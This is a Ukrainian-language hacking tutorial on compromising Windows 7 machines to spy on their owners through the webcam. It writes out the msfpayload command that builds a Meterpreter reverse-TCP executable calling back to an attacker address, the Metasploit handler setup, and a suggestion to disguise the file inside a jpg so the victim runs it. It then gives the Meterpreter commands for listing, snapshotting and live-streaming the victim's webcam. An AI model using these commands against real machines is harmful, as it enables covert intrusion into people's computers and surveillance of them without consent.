Підглядає через web-камеру

8

Всім привіт!

Давайте сьогодні поговоримо про один з можливих зломів Windows 7, плюс до всього будемо підглядати через web-камеру.

Web-камера давним давно стала невід’ємною частиною апаратного забезпечення комп’ютера і не важливо ноутбук це або стаціонар. До того ж великий відсоток користувачів до цих пір використовують Windows XP і Windows 7, на які вразливостей вище даху. До всього цього можна додати невміння користувачами налаштовувати свою ОС, що вже грає важливу роль!

Отже, давайте скористаємося однією з давно знайдених, але досі працюють вразливостей для Windows 7, яка зачіпає UAC (User Account Control). Він нею ви можете прочитати:

Windows zero-day flaw bypasses UAC!
New Windows Vulnerability Bypasses UAC
Bypassing UAC with User Privilege under Windows Vista/7
Уразливість User Account Control (UAC) в Windows 7
Для початку нам потрібно створити шкідливий виконуваний файл run_me.exe, який в BackTrack створюється так, як показано нижче:

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe

● LHOST=192.168.1.5 – IP-адреса атакуючого
● LPORT=4444 – порт атакуючого

Підглядає через web-камеру

Запускаємо Metasploit:

# msfconsole

Далі вводимо команди:

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.5
> exploit

Тепер нам потрібно, що користувач запустив файл run_me.exe. Як це добитися вже інша історія, як варіант можна засунути шкідливий файл в інший файл. Наприклад, приховати/склеїти exe-файлу в jpg. Це не єдиний варіант, тому озброюйтесь googl’ом.
Після того, коли жертва запустить файл, ми отримаємо контроль над системою з привілеями SYSTEM. Тепер можна робити все, що завгодно! Але зараз будемо підглядати за користувачем.

Спочатку подивимося, чи є взагалі у нього web-камера?

meterpreter > webcam_list
1: Logitech Webcam 120

Та нам пощастило! Є одна web-камера: Logitech Webcam 120.

Тепер зробимо знімок:

meterpreter > webcam_snap

Так само можна спробувати запустити web-камеру в режимі реального часу. Робиться це наступною командою

meterpreter > run webcam -p /var/www

Після чого відкриється браузер і ви будете бачити те, що бачить камера. Якщо браузер не відкриється, значить відкрийте його самі і в адресному рядку введіть:

/var/www/webcam.html